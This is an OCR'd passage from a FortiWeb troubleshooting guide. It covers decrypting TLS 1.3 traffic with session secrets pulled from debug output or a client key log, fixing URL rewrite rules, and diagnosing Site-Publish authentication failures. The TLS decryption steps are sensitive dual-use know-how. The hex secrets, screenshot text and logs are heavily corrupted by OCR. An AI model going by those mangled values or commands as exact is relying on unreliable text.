< >
OK Cancel Help

Decrypting TLS 1.3 Traffic

2,

FortiWeb Trouble-shooting Guide

Capture packets on FortiWeb, and enable diagnose debug flow at the same time as follows.
FortiWeb# diagnose debug flow filter flow-detail 4

FortiWeb# diagnose debug flow trace start

FortiWeb# diagnose debug enable

Please note:
« Add filters when capturing packets on FortiWeb;

« Do not add filters in diagnose commands as below if the back-end server provides SSL/TLS service,
otherwise SSL keys cannot be displayed in diagnose output. It's a known limitation while we’ll enhance
it in future builds.

« If you only wants to decrypt SSL traffic from clients to FortiWeb, below filters can be added
diagnose debug flow filter client-ip 172.30.214.11
diagnose debug flow filter server-ip 10.159.37.33

The keys can be also found in the diagnose debug output as follows. It’s a little different from that of TLS1.2

and before.

[work O] [flow] ssn 5 policy SP 01 strm 0 dir O subclient 0 client 32 ssl handshake
(172.30.212.177:1039—>10.ES9.37.1:7002),ssl event:2

[work O] [flow] ssn 5 policy SP 01 strm 0 dir O subclient 0 client 32 [ST-ssl-
handshake], conn st OXOOO_OOOO4

tlsl.3 ssl key (server):

SERVER HANDSHAKE TRAFFIC SECRET
72e61efe2594465b£79935093e9d73254elcd2e67£0acee06379166af25be863
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ab2744e732£1b328650040653ea0d9845fa8726£79b19%a6bodbdf08ff24c735efc907e948a53
709c0cf5ef2c7038c8af

tlsl.3 ssl key (server):

CLIENT HANDSHAKE TRAFFIC SECRET
72e61efe2594465p£79935093e9d73254elcd2e67f0acee06379166af25be863
e14368e33bd50bad4dd106d0a5018e8e145e112b9%cdac6fd3e04550b2479399%bbf8bc54ab0£522
512£f93170c754d32a9%ad

tlsl.3 ssl key (server):

EXPORTER_SECRET 72e61efe2594465b£79935093e9d73254elcd2e67f0acee06379166af25be863
31ccbf2227090eea6653d334£5fd9%9a08667292ac0a220e25f139270fde716a5a14f3b426bal6
11b012b985e04028c178

tlsl.3 ssl key (server):

SERVER_TRAFFIC_SECRET_O
72e61efe2594465bf79935093e9d73254elcd2e67f0acee06379166af25be863
Ofaae977efSba3baccdac2bl89%eedefeadccf7363£fc78£6933569f42659f27ecelbdaed43dff8
8a7dal8b950e5d021505

[conn lib]ssl handshake, state:l

[work O] [flow] ssn 5 policy SP 01 strm O dir O subclient 0 client 32 ssl handshake
(172.30.212.177:1039->10.159.37.1:7002) ,ss1 event:2

[work 0] [flow] ssn 5 policy SP 01 strm 0 dir O subclient 0 client 32 [ST-ssl-
handshake], conn st 0x00000004

tlsl.3 ssl key (server):

CLIENT_TRAFFIC_SECRET_O
72e61efe2594465bf79935093e9d73254elcd2e67f0acee06379166af25be863
c06b9cb7332bd05f1761d6ba6621345aa73a018f5f5db2ddfebl60b3aec755£8a9%9a40fd30041
232a3d37bfb93aff24bd

[conn lib]ssl handshake, state:2

The first column is tls1.3 secret label as below:

CLIENT EARLY TRAFFIC SECRET: client early traffic secret
CLIENT HANDSHAKE TRAFFIC SECRET:client handshake secret

SERVER HANDSHAKE TRAFFIC SECRET:server handshake secret

CLIENT TRAFFIC SECRET O: client application data secret
SERVER TRAFFIC SECRET O: server application data secret

3. Create a wireshark key file. The key file format is as follows with content retrieved from the diagnose

output.

root@ut:/home/test/keys# cat tlsl.3 key.file

SERVER HANDSHAKE TRAFFIC SECRET
72e61efe25944650£79935093e9d73254elcd2e67f0acee06379166af25be863
a52744e732f1b328650040653ea0d9845fa8726f7

99b19a6b6dbdf08ff24c735efc907e948a53709c0cf5ef2¢c7038c8af

CLIENT HANDSHAKE TRAFFIC SECRET
72e61efe25944650£79935093e9d73254elcd2e67f0acee06379166af25be863
e14368e33bd50bad4dd106d0a5018e8e145e112b9c

dac6fd3e0455b2479399%0bf8bc54ab0£522512f93170c754d32a9%ad

EXPORTER_SECRET 72e61efe2594465b£f79935093e9d73254elcd2e67f0acee06379166af25be863
31cchbf2227090eea6653d334f5fd9%9a08667292ac0a220e25£139270fd

e716a5a14f3b426ba0611b012b985e04028c178

SERVERﬁTRAFFICisECRETio
72e61efe25944650£79935093e9d73254elcd2e67f0acee06379166af25be863
Ofaae977efSba3baccdac2bl89eedefeadccf7363£fc78£693

3569f42659f27ecelbdaed3dff88a7dal8b950e5d021505

CLIENTiTRAFFIcisECRETio
72e61efe25944650£79935093e9d73254elcd2e67f0acee06379166af25be863
c06b9cb7332bd05f1761d6ba6621345aa73a018£5f5db2ddf

eb160b3aec755f8a9%9a40fd30041232a3d37bfb93aff24bd

SERVER_HANDSHAKE_TRAFFIC_SECRET
49e35b0c4ddf3e521e07d2fc660a271cff2b2b643170bd48£343a69eb57ce70bb

FortiWeb Trouble-shooting Guide Fortinet Technologies, Inc.



Diagnose software function issues 92

feleb5cef9ca293fbd4899612d89339%9e0d76a5426
55ccb08c249d32e330bc8232a8572d9%0dcea7bbfd002764d£f227458

EXPORTER_SECRET 49e35b0c4ddf3e521e07d2fc660a271cff2b2b64317bd48£343a69%eb57ce70b6
5549b723b72fb18c30cc25a8ce86f8b5afelbcfaled9b6c3b9584408

ef6fdac0c6286083c4046c99433e0424724351c¢

SERVER_TRAFFIC_SECRET_O
49e35b0c4ddf3e521e07d2£fc660a271cff2b2b643170d48£343a69eb57ce70b6
balbb94d8740f7609919018ab0c09201ladeb2ed6f6d8687ad

892bdcf00e3bbc2f6ee253e26cf005acdabc6e80d2a29c?

CLIENT HANDSHAKE TRAFFIC SECRET
49e35b0c4ddf3e521e07d2fc660a271cff2b2b643170d48£343a69%9eb57ce70b6
6£c9d895b73d8e8£33461b043ab0239b757d734b8

£1ddela664d519792cddd82aed2f81cc892f4e01865f68785851cc3

CLIENT TRAFFI C_SECRET_O
49e35b0c4ddf3e521e07d2fc660a271cff2b2b643170d48f343a69%9eb57ce70b6
d4£3118b685428e8d53f7bbd63cl15baa8b9828a8af062d984

1619fa2d6b076d27bb3735df598f06204£13918a7993218

You can manually copy & save the these sections to a file, or use a Linux command to retrieve them in the
FortiWeb backend shell or a Linux machine as follows:
root@utma:/home/test# awk '/EXPORTER SECRET|SERVER HANDSHAKE TRAFFIC
SECRET| SERVER TRAFFIC SECRET 0|CLIENT HANDSHAKE TRAFFIC SECRET|CLIENT
TRAFFIC SECRET 0/{print $1" "$2" "$3}' tlsl.3 flow.log > tlsl.3 key.file
4. Setwireshark: edit > preference > protocols > TLS: choose the key file “tls1.3_key.file” from "(Pre)-Master-
Secret log filename". Then you'll be able to see that decrypted HTTP traffic.
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| Ml 22 pcap — O X
|4 mZe NEQRe=sZEFs S Q¥
[. |.App|‘,.-' a display filter ... <Ctrl-/> [= RIEJ
Ho. Time Source Destination Protocol Length ~
B M Wireshark - Preferences X P—
4 TETRA " Transport Layer Security
TFP
g TFIP RSA keys list Edit... 5
g Thread TLS debug file 5
Thrift | F— i
Tibia 6
g TIME Reassemble TLS records spanning multiple TCP segments e
1¢ TIPC Reassemble TLS Application Data spanning multiple TLS records 5 |
i? TiVoConnect [] Message Authentication Cade (MAC), ignore "mac failed" 2
1 TLS
1 Pre-Shared K
13 e e | | g
14 Token-Ring (Pre)-Master-Secret log filename 6 v
| 8 TPCP |C:‘\Users\amaDl\Desktop\tIsl.Lkey.ﬂle | | Browse... |
Frame TPKT
Ethern TPM2.0 p1)
Intern TPNCP
Transn| TRANSUM Len: @
TSDNS
TSP v
< >
oK Cancel Help
| g2
O 7 2(22).pcap || Packets: 294 - Displayed: 294 [’_100.0%)” Profile: Default

A Simpler way to decrypt TLS traffic on Windows PC

If you’re using a Windows client and want to decrypt SSL/TLS traffic from the client to FortiWeb, there is a
simpler way to get the SSL keys instead of retrieving them from FortiWeb diagnose output.

1. Seta Windows environment variable.
E.g. Create a new environment variable under User variables and select a file named “ssl-keys.log” to store
SSL keys.
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Transport Layer Security TELNET
- R o Ressseribe TLSrecords spanning mutple TCP segments
GET / HTTP/1.1\r\n Ry Reassembie TLS Applcation Data spanning mutpe TLS records
Host: 192.168.101.100\r\n [] Message Authentication Code (MAC), ignore “mac failed”
Connection: keep-alive\r\n TeP .
sec-ch-u. Not;A Brand” TFTP ove, Shaved ke
Thread Pre) aster Secretlog flename
sec-ch-ua-platfors Thrift (C:\Users\Administrator Pocuments ssl-keys.log Browse.
Upgrade-Insecure-Requests: 1\r\n Tibia
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win6d; x64) ApplelebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/s3| TIME
Accept: text/html,applicati licati 1;-0.9, 1 i png, */*3q=0. ication/signed ge; TiPC
Sec-Fetch-Site: none\r\n ToConnect N
Sec-Fetch-Mode: navigate\r\n e
Sec-Fetch-User: 21\r\n ™
0 09 0f a0 2c 02 00 6c 29 d5 22 89 08 00 45 00 L) E Toien.Rin:
63 1a 2 24 40 00 80 66 00 00 CO a8 65 02 <0 a8 .50 e >
6564 cd 5101 bb 59 0d 12 6e a2 bb 59 4 50 18 ed-Q--Y- n--YOP
04 02 42 c4 00 00 17 03 03 02 od 00 00 00 00 00 N Concel o
60 00 01 a9 d5 cb 7 68 42 88 4c 43 8f 8d 7 Oa B-LC

Please Note:

This method cannot capture and analyze packets from FortiWeb to the backend server.

Application Delivery - URL Rewriting

3.1FAQ

Why does URL rewriting not work?

If FortiWeb is not rewriting URLs as expected, complete the following troubleshooting steps:
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1. Ensure the value of Action Type is correct.
Request Action rewrites HTTP requests from clients, and Response Action rewrites responses to clients
from the web server.

2. Ensure that you have added items to the URL Rewriting Condition Table.
3. If one of your conditions uses a regular expression, ensure that the expression is valid.
« Click the >> (double arrow) button beside the Regular Expression field to test the value.
« Foran online guide for regular expressions, go to:
http://www.regular-expressions.info/reference.htmi
« Foran online library of regular expressions, go to:
http://regexlib.com
« Ifthe page is compressed, ensure that you have configured a decompression policy.
4. Check if the webpage size is larger than the Maximum Body Cache Size.

URL body rewriting does not work when the page is larger than the cache buffer size. The default size is
64KB.

Go to System > Config > Advanced and adjust the value of Maximum Body Cache Size.

To adjust the buffer using the CLI, use a command like the following example:

config global
config sys advanced
set max-cache-size 1024
end
end

5. For a Response rewrite rule and the action is “Rewrite HTTP Body”, ensure there is a “Content-Type”
header in the response from the backend server, and the Content-Type (also called Internet or MIME file
types) must be supported by FortiWeb.

FortiWeb supports the following Content-Type values only:

« text/html

« text/plain

« text/javascript

« application/xml

o text/xml

« application/javascript
« application/soap+xml
« application/x-javascript
« application/json

« application/rss+xml

“Content-Type” is not a must for other types of rewrite rules including Request rewrite rules and Rewrite
HTTP Header rules.

6. Specifically, if the option Content Type Filter is enabled in the match condition, only the types selected in
Content Type Set will be matched and rewritten. Webpages with other unselected types will match the
rewrite rule.

7. Enable diagnose logs for further analysis:

FWB # diagnose debug application url-rewrite 7
FWB # diagnose debug enable

Diagnose logs will show HTTP request & response details, url-rewrite rule & policy matching conditions
(match or not), etc.

Example: url-rewrite-policy “redirect policy 01” contains two rules.
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« “redirect_rule_01"is arequest redirect action that aims to remove the port 8443

« ‘“url-rewrite-rule-ResponseAction-RewriteBody” is a response rewrite body action that targets to

replace “It works!” with “Hey, It works now!!”

For request direction, all conditions are matched so redirect 301 is responded to the client.

URL Rewriting Policy URL Rewriting Rule

Edit URL Rewriting Rule

Mame redirect_rule_01
Action Type Request Action JEELLEYNGN!

Reguest Action | Redirect (301 Permanently) hd

Cancel

URL Rewriting Condition Table

+ CreateNew ¢ Edit @ Delete
ID Object Regular Expression Protocol Filter Protocol
| HTTP Host portal.testdomain.com:8443 Disable -
2 HTTPURL findex_ html Disable .
Replacement Location

Location http://portal testdomain.com

[url rewrite] [INFO] (./waf module/url rewrite.c:2543): CLIENT -> SERVER.

[url rewrite] [INFO] (./waf module/url rewrite.c:2483): Request host:
[portal.testdomain.égm:8443]. N

[url rewrite] [INFO] (./waf module/url rewrite.c:2487): Request url: [/index.html].

[url rewrite] [INFO] (./waf module/url rewrite.c:1619): url rewrite policy name:
[redirectipolicyiol]f B

[url rewrite] [INFO] (./waf module/url rewrite.c:515): url rewrite rule name:
[redirect rule 01] /Eheck rule conds.

[url rewrite] [INFO] (./waf module/url rewrite.c:523): the matching host
:portal.testdomain.égm:8443 -

[url rewrite] [INFO] (./waf module/url rewrite.c:528): the matching url :/index.html

[url rewrite] [INFO] (./waf module/url rewrite.c:651): all conditons matched!

[url rewrite] [INFO] (./waf module/url rewrite.c:1658): matched...

[url rewrite] [INFO] (./waf module/url rewrite.c:1660): the pcre capture $0 is

[url rewrite] [INFO] (./waf module/url rewrite.c:1572): the action is :8

[url rewrite][INFO](./waf_module/url_rewrite.c:1342): make redirect response.

[url rewrite] [INFO] (./waf module/url rewrite.c:1351): the new location is
http://portal.testddﬁain.com -

[url rewrite] [INFO] (./waf module/url rewrite.c:2565): The response custom redirect
301. B B

[url rewrite] [INFO] (./waf module/url rewrite.c:2543): CLIENT -> SERVER.

[url rewrite] [INFO] (./waf module/url rewrite.c:2483): Request host:
[portal.testdomain.éam]. B

[url rewrite] [INFO] (./waf module/url rewrite.c:2487): Request url: [/].

[url rewrite] [INFO] (./waf module/url rewrite.c:1619): url rewrite policy name:
[redirect_policy_Ol]i B

[url rewrite][INFO](./waf_module/url_rewrite.c:515): url rewrite rule name:

[redirect rule 01] ,check rule conds.
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[url rewrite] [INFO] (./waf module/url rewrite.c:523): the matching host
:portal.testdomain.com

[url rewrite] [INFO] (./waf module/url rewrite.c:643): not matched,and no invert,not
matched.

For response direction, all condition is also matched so body-rewrite is also performed.
URL Rewriting Policy URL Rewriting Rule

Edit URL Rewriting Rule

MName uri-rewrite-rule- LIor LEWT
Action Type Request Action
Response Action | Rewrite HTTP Body v

URL Rewriting Condition Table

*+ CreateNew ¢ Edit

ID Object Regular Expression Protocol Filter Protocol

2 | HTTP Body (")) (>} works) Disable -

Replacement Strings in Body

Replacement Hey, $0$15253 now!

[url rewrite] [INFO] (./waf module/url rewrite.c:2607): SERVER -> CLIENT.

[url rewrite] [INFO] (./waf module/url rewrite.c:1920): response rewrite check.

[url rewrite] [INFO] (./waf module/url rewrite.c:1924): url rewrite policy name:
[redirect_policy_Ol]i B

[url rewrite] [INFO] (./waf module/url rewrite.c:1763): http body cache (3477)
finish. a a

[url rewrite] [DEG] (./waf module/url rewrite.c:1814): response raw body: [HTTP/1.1
200 OK B B

Date: Thu, 26 May 2022 21:03:08 GMT

Server: Apache/2.4.41 (Ubuntu)

Last-Modified: Thu, 07 Oct 2021 17:55:36 GMT

ETag: "2aa6-5cdc6£84d8056-gzip"

Accept-Ranges: bytes

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 3138

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

[url rewrite] [INFO] (./waf module/url rewrite.c:846): body rewrite check rule
conds... - - - B B h -

[url rewrite] [INFO] (

[url rewrite] [INFO] (

[url rewrite] [INFO] (
ovector[1l]: 433

[url rewrite] [INFO] (
matched!

./waf module/url rewrite.c:912): content type is 1
./waf module/url rewrite.c:913): content type set is 65535
./waf module/url rewrite.c:962): match ovector([0]; 385

./waf_module/url rewrite.c:1006): all body-rewrite conditons
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How will multiple rules in one rewrite policy be matched?

If multiple rules are configured in one URL rewrite policy, then these rules will be matched in order. That is to
say, when the traffic matches the first rule and is processed, the following rules will be skipped and not take
effect any more.

This is also one of the reasons that a rewrite rule does not take effect.

You can move a rewrite rule to adjust the order of entries via CLI or GUI as below:

How will multiple match-conditions in one rewrite rule be matched?

The relationship between multiple match-conditions are AND. So only if all conditions are matched, the request
or response will be rewritten.

How will FortiWeb handle duplicate headers that are matched by rewrite
rules?

From HTTP RFC7230, multiple headers with the same name (e.g. Set-Cookie, www-authenticate) are
acceptable and may be received by FortiWeb.

FortiWeb will handle such situations as below:

« IfaField Name configured in HTTP Header Removal matches multiple headers, all these headers will be
removed,;

« For Replacement URL, Referer and Location, in theory only the first header will be replaced. However,
in practice duplicate these header fields can be hardly duplicated appearing in the same HTTP packet.

Why sometimes URL rewriting rules cause Loop in browser visiting?

It's a typical issue that sometimes after rewriting rules are added, you may observe loop failures when visiting a
server-policy on browsers. However, these issues are usually caused by configuration mistakes.

Below is an example of such misconfiguration failures:

The request action is Redirect 301. The match condition object is “HTTP Host” with
portal.testdomain.com, and the replacement Location is configured as “/test.html”.

The user intended to redirect the visit to the default webpage of portal.testdomain.com to
portal.testdomain.com/test.html, but with this configuration, the browser will visit
“http://portal.testdomain.com/test.html” after receiving the 301 response, because the Location header is just
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“/test.html” rather than a full URI. However this new request will match the rewrite rule again and trigger another

301, thus causing an unexpected loop failure.

& Dashboard * | URLRewritingPolicy | URL Rewriting Rule

& Nefwork * | EditURL Rewriting Rule

4 System >

N& Security Fabric > | Name redirect_rule_01

& User » | Action Type PEVIEER.SG Gl Response Action

B Policy » | Request Action ] Redirect (301 Permanently) - I
£ Server Objects >

¢ Application Delivery ~

URL Rewriting Condition Table

Cancel
URL Rewriting

Authentication

+ CreateNew &' Edit [ Delete

Site Publish
Compression {In] Object Regular Expression
& Web Protection > (1 [H7TP Host portal testdomaincom | Disable
o Bot Mitigation >
2 API Protection > Replacement Location
U DoS Protection > ’7 Location | Atesthtml |
B P Protection >

@ portal.testdomain.com

Sources  Network X Performance

[ Disable cache

A
Nothrotting ¥ %

Name

[ testhtm

ming

w General

[ testhim

test.html

Request URL: hitp

This page isn't working right now Request Method:

portal.testdonain,com/test  html

[status code:

Remote Addres:

Referrer Policy:

[paml.lestdamain.com redirected you too many times, I

To fix this issue, try clearing your cookies + Response Henders
ERR_TOO_MANY_REDIRECTS Content-Length: 95

Content-Type: text/htnl

Location: /test.ntml

* Request Headers
Accept: text/htal
B,°/*;0=0.8,appl
Accept-Encoding: gzip, deflate

Accept-Langua

Cache-Control: max

Connection: keep-alive

Upgrade-Insecure-Request:
User-Agent: Mozilla/5
ke Gacko) Chrome/160.0.489

KB transferred 2.0 kB resou

To resolve this issue, you can add an extra condition rule as below, then the visits to
“http://portal.testdomain.com/index.html” will be successfully redirected to
“http://portal.testdomain.com/test.html”, and no loop occurs again.
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@ Dashboard

URL Rewriting Policy URL Rewriting Rule

>
+ Network ? | Edit URL Rewriting Rule
£ System >
% Security Fabric 5 Name redirect_rule_01
Action Type REVIEEEG LN Response Action
& User >
Request Action Redirect (301 Permanently)
B Policy > a ! e e
>

£ Server Objects

*& Application Delivery ~ “ Cancel
URLR iti
= URL Rewriting Condition Table

Authentication + Create New # Cdit

Site Publish >

N 1D Object Regular Expression
Compression
& Web Protection > |1 HTTP Host portal.testdomain.com
2 Bot Mitigation > 2 HTTPURL findexchtml
2 API Protection > Replacement Location
U Dos Protection ’ Location ftesthtml
B |P Protection >

The tip here is that Location needs to be a full URI, otherwise the browser will reuse the original Host with the
relative URI specified by Location.

For example, if you want to redirect a URL to https://www.google.com, then you need to configure the Location
as “https://www.google.com”, not just “www.google.com”, otherwise the browser will visit
“http://portal.testdomain.com/www.google.com” after it received 301 redirect.

Application Delivery - Site Publish

FAQ

What'’s the difference between HTTP/User authentication and Site-Publish?
Which solution is recommended?

You can treat Site-Publish as a substitute and better solution to replace HTTP authentication.

Most HTTP/User authentication functions can be implemented by Site-Publish, and FortiWeb recommends
using Site-Publish policies instead of HTTP/User authentication policies for better future up-to-date technical
support.

How will authentication server pool members be used to authenticate clients if
multiple remote servers are contained in one pool for Site-Publish rule?

When you configure a site publishing rule that offloads authentication for a web application to FortiWeb, you use
an authentication server pool to specify the method and server that FortiWeb uses to authenticate clients.

The pool can contain one or more servers that use either LDAP or RADIUS to authenticate clients. FortiWeb
attempts to authenticate clients using the server at the top of the list of pool members, and then continues to the
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next member down in the list if the authentication is unsuccessful, and so on. You can use the list options to
adjust the position of each item in the list.

Troubleshoot Site-Publish Issues

Compared with User/HT TP authentication, Site-Publish provides more flexible and advanced features such as
single sign-on (SSO) and combination access control and authentication such as Two-factor authentication.

The sections below will introduce troubleshooting methods according to Site-Publish deployment scenarios:

« Common troubleshooting methods
« Typical authentication failures

« Two-factor authentication issues

o SAML issues

« Kerberos Issues

Common troubleshooting steps for Site-Publish issues

1. Forallissues, it's better to double check the necessary configuration steps for Site-Publish:
« Remote servers are created in User > Remote Server;
« Remote servers are added to Application Delivery > Site Publish > Authentication Server Pool;
« Site Publish Rule is created in Application Delivery > Site Publish > Site Publish Rule;
o Published Site, Path, Client Authentication Method, and Authentication Server Pool are
configured correctly;
« Delegation servers and parameters are correctly configured,;
Please Note that some fields such as URL Path KCD SPN are case sensitive. You must input the
exact upper or lower case strings.
« The Site Publish Rule is added into a Site Publish Policy;
« The Site Publish Policy is selected in a Web Protection Profile;
« The Web Protection Profile is selected by the server-policy to protect the target website.
2. Check the connectivity & availability of remote servers for authentication server pool:
You can check the connectivity and service availability via below steps:
« Ensure the IP address and service ports configuration on FortiWeb comply with which are provided by
the remote servers;
« Use ping to confirm no connectivity issue between FortiWeb and the remote server;
o Use the Test button ("Test LDAP" or "Test Radius") in User > Remote Server > LDAP/Radius
Server to test if the remote server can be connected successfully;
» Use browsers or other test clients rather than FortiWeb to visit the backend server to confirm if the
backend server is reachable;
« Use a different remote server to determine if the authentication just fails with a specific type of remote
server,;
« Capture packets on FortiWeb and the remote server to determine if the authentication queries are sent
out by FortiWeb, if responses are correctly received by FortiWeb or delayed, and if the queries are
received by the remote server, etc.
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3. Enable Event log for site-publish rule and check the login failure logs on FortiWeb.

To generate event logs, go to Application Delivery > Site Publish > Site Publish Rule > Edit a Rule >
Alert Type, select Failed Only or All, then you'll be able to see event logs when an authentication failure
occurs. Such event logs are usually simple, but can help us to confirm the issue.

E.g.
v0l2xxxxdate=2022-05-05 time=15:19:19 log i1d=11002003 msg_1d=000006998393
device i1d=FVVM08TM21000613 vd="root" timezone="(GMT-7:00)Mountain Time
(Us&Canada)" timezone dayst="GMTb+7" type=event subtype="system" pri=alert
trigger policy="N/A" user=daemon ui=daemon action=login status=failure
msg="User user(0l [Site Publish]
172.30.212.181"

Check logs on the remote servers.
FortiWeb supports using remote servers including LDAP, Radius, KDC, SAML servers to authenticate
clients, and also support

login failed on portal.testdomain.com from

If authentication queries are sent out from FortiWeb and received by remote servers, while eventually fail to
be authenticated, logs with detailed process or failure reasons can usually be generated by these servers.
Checking such logs often helps to find the cause of failures.

Particularly, if FortiAuthenticator is used as the remote servers, you can check two types of
FortiAuthenticator logs:

« Eventlogs: FortiAuthenticator > Logging > Log Access > Logs
« Debug logs: visit https://<FortiAuthenticator _|IP>/debug/.
Please refer to an 2FA auth failure caused by invalid token as below:

Syster > | & Refresh | @ Simpiified| | & Downloads - 9 oo Pesiod: Last 24hours @ D
Authentication >
Eertinet 550 Method , | D Timestamp Short Me: Categ b Cat Log Type ID Actios status User Source IP
Monitor ,| 8  Fime rtiTe Event 20103 Authenticat Failed fest 10.65.1.51
Mana »| 887  FiMay1. Localu: Event 20300 Authenticat Pending test 10.65.1.51
886  FriMayl.. Sending authentication notification to Userltest] information Event Web Service 50501 Authenticati. Pending localhost
885  FriMay 1. Local user authentication partially done (chosen FTM push notificatio. information Event Authentication 20300 Authenticati Pending test 10.65.1.51
884  FriMay 1. Local user authentication partially done, expecting FortiToken information Event Authentication 20300 Authenticat Pending test 10.65.1.51
883 FriMay1.. Webac nted to ‘admin information Event Authentication 20994 Login Success admin 17230212107
882 FriMayl.. Administrator ‘admin'logged in information Event Authentication 20094 Login Success admin
881 FriMayl. Locala ntication with no token successful information Event Authentication 20994 Login Success admin
880 ThuMay... Localuserauthentication with FortiToken successful information Event Authentication 20002 Authenticat Success test 1065.1.51
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&« 0.65.1 .64_-"c|ebuglrac ius/

C A Notsecure Ih=t-ps

v
notification to your FortiToken Mobile®
2822-85-13T@1:32:45,363524-87: 0@ FortiAuthenticator
2@22-85-13T@1:32:45,363529-87: 88 FortiAuthenticator
2822-85-13T01:32:46.829951-87: 8@ FortiAuthenticator
2822-85-13T@1:33:87.868011-87:8@ FortiAuthenticator
2822-85-13T@1:33:07.868057-07: 08 FortiAuthenticator
18.65.1.64:1812 length 64
2022-85-13T7@1:33:07.568065-87
2022-85-13T@1:33:87.868875-87
2022-85-13T7@1:33:087.868079-87
2022-85-13T7@1:33:087.5868083-87
2022-85-13T91:33:87.868893-87
enabled/default
2022-85-13T@1:33:
2822-85-13T81:33:

St:'r‘."c.e:[ RADIUS Authentication Max. log files size:| 200 KB

rediusd[1868]:
readiusd[1868]:
rediusd[1868]:
rediusd[1868]:
radiusd[1868]:

FortiAuthenticator
FortiAuthenticator
FortiAuthenticator
FortiAuthenticator
FortiAuthenticator

ag
ae
ag
ag
ae

rediusd[1868]:
radiusd[1868]:
rediusd[1868]:
rediusd[1868]:
radiusd[1868]:

FortiAuthenticator
FortiAuthenticator
2822-85-13T@1:33:87.868162-87:0@ FortiAuthenticator
2822-85-13T@1:33:87.868632-87:0@ FortiAuthenticator
18.65.1.51: FWB_10.65.1.51 (18.65.1.51)

2822-85-13T01:33:87.869622-87:0@ FortiAuthenticator
20822-85-13T81 187.869634-87:8@ FortiAuthenticator
2022-85-13T81 1B7.869645-087:9@ FortiAuthenticator
20822-85-13T81 1B7.869657-87:8@ FortiAuthenticator
20822-85-13T81 1B7.869665-87:8@ FortiAuthenticator
2022-85-13T81 1B7.869670-87:9@ FortiAuthenticator
20822-85-13T81 1B7.869678-87:80@ FortiAuthenticator
20822-85-13T81 187.869683-87:8@ FortiAuthenticator
2822-85-13T81 187.869688-87:9@ FortiAuthenticator
2022-85-13T701 :B87.870466-07:88 Fortifuthenticator
% % g g FortiAuthenticator

7.
7.

868137-87:
865148-87:

ag
ae

rediusd[1868]:
radiusd[1868]:
rediusd[1868]:
rediusd[1868]:

rediusd[1868]:
rediusd[1868]:
radiusd[1868]:
rediusd[1868]:
rediusd[1868]:
radiusd[1868]:
rediusd[1868]:
rediusd[1868]:
radiusd[1868]:
readiusd[1868]:
rediusd[1868]:

2822-85-13T@ .871151-87
2822-85-13T@1:33:88.537931-87
2@22-95-13T@1:33:88.873960-87
length 2@

2822-95-13T@1:33:@

Fortiduthenticator
FortiAuthenticator
FortiAuthenticator

readiusd[1868]:
rediusd[1868]:
radiusd[1868]:

ag
ag

FortiAuthenticator

=

.B74833-87:0

&

rediusd[1868]:

5. Check site-publish diagnose logs:

A

(32)
(32)

e« 00C

Enter debug mode @& Q| Searchinthe log
Fortinet-FAC-Challenge-Code = "@@1"
State = @x31

Waking up in 59.3 seconds
Waking up in 8.6 seconds.

(33)

(33)
(33)
(33)
(33)
(33)

(33)
(33)
(33)
(33)

(33)
(33)

Not doing PAP

(33)
(33)
(33)
(33)
(33)
(33)
(33)
(33)

(33)

Received Access-Request Id 22 from 18.65.1.51:8648 to

NAS-Identifier = "FWB-5itePublish”
State = @x31
User-Name =
User-Password:
# Executing section authorize from file fusr/etc/raddb/sites-

ntagt®
FRdERE

facauth: NAS IP:18.65.1.51

facauth: Username;test

facauth: ===>Timestamp:1652438787.367388, age:@ms

facauth: Found authclient from preloaded authclients list for
facauth: Found authpolicy "Radius_2FA' for client '18.65.1.51"
facauth: Setting 'Auth-Type := FACAUTH®

as Auth-Type is already set.
# Executing group from file jusr/etc/raddb/sites-enabled/default

facauth: This iz a response to Access-Challenge

facauth: Partial auth user found

facauth: Reguest contains token code

facauth: Proceed to authenticate token code

facauth: Successfully found partially authenticated user instance.
facauth: Authentication failed

facauth: Updated auth log "test': Local user authentication with

# Executing group from file jusr/etc/raddb/sites-enabled/default

Waking up in 8.3 seconds.

(33)

sent Access-Reject Id 22 from 18.65.1.64:1812 to 18.65.1.51:8648

Waking up in 36.4 seconds

It's simple to enable site-publish related diagnose logs, which can provide very detailed information for

the packet processing flow:

# diagnose debug application site-publish 7

# diagnose debug timestamp enable
# diagnose debug enable

Besides, if you're not sure if the issue is related to other FortiWeb features, or need logs of the complete
user access session, please also enable diagnose flow logs for further investigation.

# diagnose debug flow filter flow-detail 7

#Enables messages from each packet

processing module and packet flow traces
# diagnose debug flow filter http-detail 7 #HTTP parser details

# diagnose debug flow filter module-detail status on

modules processing the flow

# diagnose debug flow filter server-ip 192.168.12.12

the real server IP in TP/TI mode

# diagnose debug flow filter client-ip 192.168.12.1

# diagnose debug flow trace start

#Turn on details from

#The VIP in RP mode or

#The client IP

Some site-publish diagnose failure logs are as below:

Remote server is not reachable:

[SP: MAIN] [WARN] (./waf module/site publish.c: 6736):

1]

user0l, password = [X]
Incorrect username or password:

[SP: MAIN] [INFO] (./waf module/site publish.c: 6736): got

from health check

[SP: MAIN] [DBG] (./waf module/site publish.c: 6776):

user0l, password = [X]

[SP: MAIN] [DBG] (./waf module/site publish.c: 1135):
Incorrect service principal name when the Authentication

Constrained Delegation:

FortiWeb Trouble-shooting Guide

LDAP server [10.65.1.97, 636,

is down by health check, then stop and auth failed
[SP: MAIN] [DBG] (./waf module/site publish.c: 6776): fail to auth [401]:

username

active IP [10.65.1.96]

fail to auth [401]: username =

elog : [user01]
Delegation is Kerberos

username:
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[SP: MAIN] [DBG] (./waf module/site publish.c: 10500): kerberos constrained
delegation - -

[SP: MAIN] [DBG] (./waf module/site publish.c: 7981): spn rule is single server

[SP: MAIN] [ERR] (./waf module/site publish.c: 5290): fail to AS of KCD
[host/testl.sitepublish.fortiweb@SITEPUBLISH.FORTIWER]

[SP: MAIN] [ERR] (./waf module/site publish.c: 10518): fail to check AS of KCD,
bypas

6. Capture packets on FortiWeb and the remote server to analyze the authentication traffic flow.
Analyzing packet interaction between FortiWeb and the remote server are usually the ultimate method to
troubleshoot authentication failures, especially when logs on either FortiWWeb or remote servers are
insufficient.
You can get the following information from captured packets:
« Ifthe authentication queries and requests are sent out by FortiWeb and received by the remote server;
« Ifresponses (accept or challenge) are sent back by the remote server and received by FortiWeb;
« Ifthere is any delay when FortiWeb sending out a request, or the remote server sending back the
response;
Clients, FortiWeb and remote servers usually have their own timeout settings for the authentication
session. As long as either of these timeout periods elapses before the response is received, it may
lead to an authentication failure.
